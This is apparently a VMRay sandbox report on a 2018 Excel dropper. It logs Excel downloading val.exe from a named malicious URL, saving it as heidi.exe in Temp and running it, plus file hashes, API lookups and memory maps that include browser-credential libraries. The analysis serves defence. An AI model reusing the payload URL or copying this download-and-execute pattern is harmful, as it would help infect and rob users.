Excel File Drops Malicious Payload (2018-02-13) | Grouped Behavior
Try VMRay Analyzer
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files (x86)\microsoft office\office12\excel.exe |
| Command Line | "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:34, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:39, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:05 |
| Information | Value |
|---|---|
| PID | 0x930 |
| Parent PID | 0x44c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9B4
0x
9B0
0x
9AC
0x
9A8
0x
9A4
0x
9A0
0x
99C
0x
998
0x
994
0x
990
0x
98C
0x
988
0x
980
0x
97C
0x
974
0x
964
0x
95C
0x
958
0x
950
0x
94C
0x
948
0x
944
0x
934
0x
9C8
0x
9CC
0x
9D0
0x
9D4
0x
9D8
0x
9DC
0x
9E0
0x
9E4
0x
A38
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\kft6utqw\appdata\local\temp\heidi.exe | 717.50 KB (734720 bytes) |
MD5:
a6a97f17880e37067c822e14a75bb3af
SHA1: 1aab183abb65685af92b201a2e47ba3d9ce0856e SHA256: b1eeec190113584579fe9376b88933d5e1871b3e8fdc86d8a490db4d044196ac |
|
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\kft6utqw\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\val[1].exe | 717.50 KB (734720 bytes) |
MD5:
a6a97f17880e37067c822e14a75bb3af
SHA1: 1aab183abb65685af92b201a2e47ba3d9ce0856e SHA256: b1eeec190113584579fe9376b88933d5e1871b3e8fdc86d8a490db4d044196ac |
|
|
| c:\users\kft6utqw\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | 96.00 KB (98304 bytes) |
MD5:
86b0d3bf293c31bdeff2b05ab254a73d
SHA1: 12ba75e806dfe5dcbca7823687f346fa2472ae4e SHA256: 8c96bbdc62be3d2d80f68c2b2a1bf722bed33b74215ede1b5f49eaca3012eced |
|
|
| c:\users\kft6utqw\appdata\roaming\microsoft\windows\cookies\index.dat | 32.00 KB (32768 bytes) |
MD5:
7c83dbeeb7811a904009ba7d48993c65
SHA1: 2923612b74c7443ffe8a54f4b2d1fe0bd6dae0bb SHA256: 33e7b8ec336fc1fc62e773ae74239f51b20e756958af32dbfc193a7cfa5f929b |
|
|
| c:\users\kft6utqw\appdata\local\microsoft\windows\history\history.ie5\index.dat | 48.00 KB (49152 bytes) |
MD5:
ef02ff50bdc43aeed96d1da34418794b
SHA1: fc6b4901d1575a9c013db2d9e2f3932d8a86b35f SHA256: 4e6dccaa3e91b08212ec5adef0881a0f13b739e8811d13a8bb75df85e2ee54c0 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe | show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Urlmon | base_address = 0x77170000 |
|
1 | |
| Load | Shell32 | base_address = 0x76100000 |
|
1 | |
| Get Filename | - | process_name = c:\program files (x86)\microsoft office\office12\excel.exe, file_name_orig = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL, size = 260 |
|
1 | |
| Get Address | Unknown module name | function = HeapCreate, address_out = 0x76e04a2d |
|
1 | |
| Get Address | Unknown module name | function = HeapAlloc, address_out = 0x77b8e026 |
|
1 | |
| Get Address | Unknown module name | function = RtlMoveMemory, address_out = 0x77bc3c40 |
|
1 | |
| Get Address | Unknown module name | function = EnumPropsA, address_out = 0x7598863e |
|
1 | |
| Get Address | Unknown module name | function = ExitProcess, address_out = 0x76e07a10 |
|
1 | |
| Get Address | Unknown module name | function = URLDownloadToFileW, address_out = 0x772066f6 |
|
1 | |
| Get Address | Unknown module name | function = ShellExecuteW, address_out = 0x76113c71 |
|
1 | |
| Get Address | Unknown module name | function = ExpandEnvironmentStringsW, address_out = 0x76e04173 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Read | virtual_key_code = VK_ESCAPE, result_out = 0 |
|
70 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Local Time, time = 2018-02-14 02:17:01 (Local Time) |
|
5 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Download | url = http://kdotraky.com/kat/val.exe, filename = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe |
|
1 |
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\users\kft6utqw\appdata\local\temp\heidi.exe |
| Command Line | "C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe" |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:03:39, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:36 |
| Information | Value |
|---|---|
| PID | 0xa3c |
| Parent PID | 0x930 (c:\program files (x86)\microsoft office\office12\excel.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A40
|
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.ENU | base_address = 0x0 |
|
1 | |
| Load | C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.EN | base_address = 0x0 |
|
1 | |
| Load | olepro32.dll | base_address = 0x75270000 |
|
1 | |
| Load | shell32 | base_address = 0x76100000 |
|
1 | |
| Load | user32 | base_address = 0x75930000 |
|
1 | |
| Load | advapi32 | base_address = 0x77330000 |
|
1 | |
| Get Handle | c:\users\kft6utqw\appdata\local\temp\heidi.exe | base_address = 0x400000 |
|
238 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76df0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x757f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75930000 |
|
3 | |
| Get Handle | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | base_address = 0x73af0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x75e10000 |
|
1 | |
| Get Filename | c:\users\kft6utqw\appdata\local\temp\heidi.exe | process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, size = 261 |
|
1 | |
| Get Filename | c:\users\kft6utqw\appdata\local\temp\heidi.exe | process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, size = 256 |
|
1 | |
| Get Filename | C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.EN | process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExA, address_out = 0x76e8434f |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x757f4c28 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x7586c802 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x7586ec66 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x75815934 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x7586d332 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x7586dbd4 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x7586e405 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x7586f00a |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x7586f15e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x75815a98 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x7586ecfa |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x7586ee2e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x7580b0dc |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x75806fab |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x758101a0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x7580699e |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x75816ba7 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x75836c12 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x7580dbd1 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x75817fdc |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x75807a2a |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x75810355 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMonitorInfoA, address_out = 0x75954413 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSystemMetrics, address_out = 0x75947d2f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EnumDisplayMonitors, address_out = 0x7595451a |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = AnimateWindow, address_out = 0x7595b531 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = InitializeFlatSB, address_out = 0x73b2266f |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = UninitializeFlatSB, address_out = 0x73b22542 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_GetScrollProp, address_out = 0x73b21d29 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_SetScrollProp, address_out = 0x73b2238d |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_EnableScrollBar, address_out = 0x73b220c9 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_ShowScrollBar, address_out = 0x73b21fdb |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_GetScrollRange, address_out = 0x73b21e8d |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_GetScrollInfo, address_out = 0x73b21f0f |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_GetScrollPos, address_out = 0x73b21ccd |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_SetScrollPos, address_out = 0x73b2216d |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_SetScrollInfo, address_out = 0x73b222be |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_SetScrollRange, address_out = 0x73b221e2 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetLayeredWindowAttributes, address_out = 0x7596ec88 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstanceEx, address_out = 0x75e59d4e |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x75e509ad |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoAddRefServerProcess, address_out = 0x75e73cf3 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoReleaseServerProcess, address_out = 0x75e74314 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoResumeClassObjects, address_out = 0x75e1ea02 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoSuspendClassObjects, address_out = 0x75e7bb02 |
|
1 | |
| Get Address | c:\windows\syswow64\olepro32.dll | function = OleCreatePropertyFrame, address_out = 0x752720ea |
|
1 | |
| Get Address | c:\windows\syswow64\olepro32.dll | function = OleCreateFontIndirect, address_out = 0x752720b7 |
|
1 | |
| Get Address | c:\windows\syswow64\olepro32.dll | function = OleCreatePictureIndirect, address_out = 0x752720c8 |
|
1 | |
| Get Address | c:\windows\syswow64\olepro32.dll | function = OleLoadPicture, address_out = 0x752720d9 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1636264 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1636264 |
|
1 | |
| Map | - | process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1ed0000 |
|
1 | |
| Map | - | protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000 |
|
1 | |
| Map | - | protection = PAGE_EXECUTE_READWRITE, address_out = 0x1a0000 |
|
1 | |
| Map | - | process_name = c:\users\kft6utqw\appdata\local\temp\heidi.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1c70000 |
|
1 |
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | heidi | class_name = TApplication, wndproc_parameter = 0 |
|
1 | |
| Set Attribute | heidi | class_name = TApplication, index = 18446744073709551612, new_long = 1708015 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 0, result_out = 4 |
|
1 | |
| Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 | |
| Get Info | type = KB_LOCALE_ID |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 1404, y_out = 317 |
|
12 | |
| Sleep | duration = 18 milliseconds (0.018 seconds) |
|
11 | |
| Sleep | duration = 206 milliseconds (0.206 seconds) |
|
10 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Operating System |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\kft6utqw\appdata\local\temp\heidi.exe | - |
|
1 | |
| Check for Presence | c:\users\kft6utqw\appdata\local\temp\heidi.exe | - |
|
1 |
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\kft6utqw\appdata\local\temp\heidi.exe |
| Command Line | "C:\Users\kFT6uTQW\AppData\Local\Temp\heidi.exe" |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:02:13, Reason: Child Process |
| Unmonitor | End Time: 00:03:39, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:26 |
| Information | Value |
|---|---|
| PID | 0xa70 |
| Parent PID | 0xa3c (c:\users\kft6utqw\appdata\local\temp\heidi.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A74
0x
A90
0x
A98
0x
A9C
0x
AEC
0x
B7C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
|
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | Readable |
|
|
|
|
| rsaenh.dll | 0x00220000 | 0x0025bfff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000220000 | 0x00220000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000220000 | 0x00220000 | 0x00220fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| tzres.dll | 0x00230000 | 0x00230fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000230000 | 0x00230000 | 0x00234fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000230000 | 0x00230000 | 0x00230fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000240000 | 0x00240000 | 0x00246fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000250000 | 0x00250000 | 0x00251fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000260000 | 0x00260000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000350000 | 0x00350000 | 0x0035ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000360000 | 0x00360000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
|
| heidi.exe | 0x00400000 | 0x004b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x004a1fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000004b0000 | 0x004b0000 | 0x0055ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004b0000 | 0x004b0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000520000 | 0x00520000 | 0x0055ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000560000 | 0x00560000 | 0x0065ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00970fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000980000 | 0x00980000 | 0x01d7ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01d80000 | 0x0204efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002050000 | 0x02050000 | 0x0214ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002150000 | 0x02150000 | 0x02250fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002150000 | 0x02150000 | 0x0224ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002150000 | 0x02150000 | 0x021cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002200000 | 0x02200000 | 0x022fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002300000 | 0x02300000 | 0x026f2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000002700000 | 0x02700000 | 0x02800fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002700000 | 0x02700000 | 0x027fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002800000 | 0x02800000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002900000 | 0x02900000 | 0x02b2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002af0000 | 0x02af0000 | 0x02b2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002b30000 | 0x02b30000 | 0x02c2ffff | Private Memory | Readable, Writable |
|
|
|
|
| wow64cpu.dll | 0x74ef0000 | 0x74ef7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x74f00000 | 0x74f5bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74f60000 | 0x74f9efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| freebl3.dll | 0x75140000 | 0x7518efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nssdbm3.dll | 0x75190000 | 0x751a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| softokn3.dll | 0x751b0000 | 0x751d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcp100.dll | 0x751e0000 | 0x75248fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mozglue.dll | 0x75250000 | 0x75271fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcr100.dll | 0x75280000 | 0x7533efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wsock32.dll | 0x75340000 | 0x75346fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winmm.dll | 0x75350000 | 0x75381fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wshtcpip.dll | 0x75350000 | 0x75354fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wship6.dll | 0x75360000 | 0x75365fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasadhlp.dll | 0x75370000 | 0x75375fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fwpuclnt.dll | 0x75380000 | 0x753b7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nss3.dll | 0x75390000 | 0x75544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winnsi.dll | 0x753c0000 | 0x753c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iphlpapi.dll | 0x753d0000 | 0x753ebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dnsapi.dll | 0x753f0000 | 0x75433fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mswsock.dll | 0x75440000 | 0x7547bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| userenv.dll | 0x75480000 | 0x75496fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| samlib.dll | 0x754a0000 | 0x754b1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| samcli.dll | 0x754c0000 | 0x754cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x754d0000 | 0x754defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x754e0000 | 0x754f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x75500000 | 0x75508fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x75510000 | 0x75520fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| profapi.dll | 0x75530000 | 0x7553afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| vaultcli.dll | 0x75540000 | 0x7554bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x75550000 | 0x7558afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x75590000 | 0x755a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x756b0000 | 0x756bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x756c0000 | 0x7571ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x75720000 | 0x757ebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x757f0000 | 0x7587efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x75930000 | 0x75a2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x75a60000 | 0x75abffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x75b90000 | 0x75cacfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x75e00000 | 0x75e0bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75e10000 | 0x75f6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76010000 | 0x760fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x76100000 | 0x76d49fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76d50000 | 0x76decfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76df0000 | 0x76efffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76f00000 | 0x76f09fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76f10000 | 0x76f66fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x77330000 | 0x773cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x773d0000 | 0x77415fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77420000 | 0x774affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x774b0000 | 0x7755bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x77700000 | 0x77718fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77720000 | 0x77754fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000077760000 | 0x77760000 | 0x77859fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000077860000 | 0x77860000 | 0x7797efff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77980000 | 0x77b28fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x77b30000 | 0x77b35fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
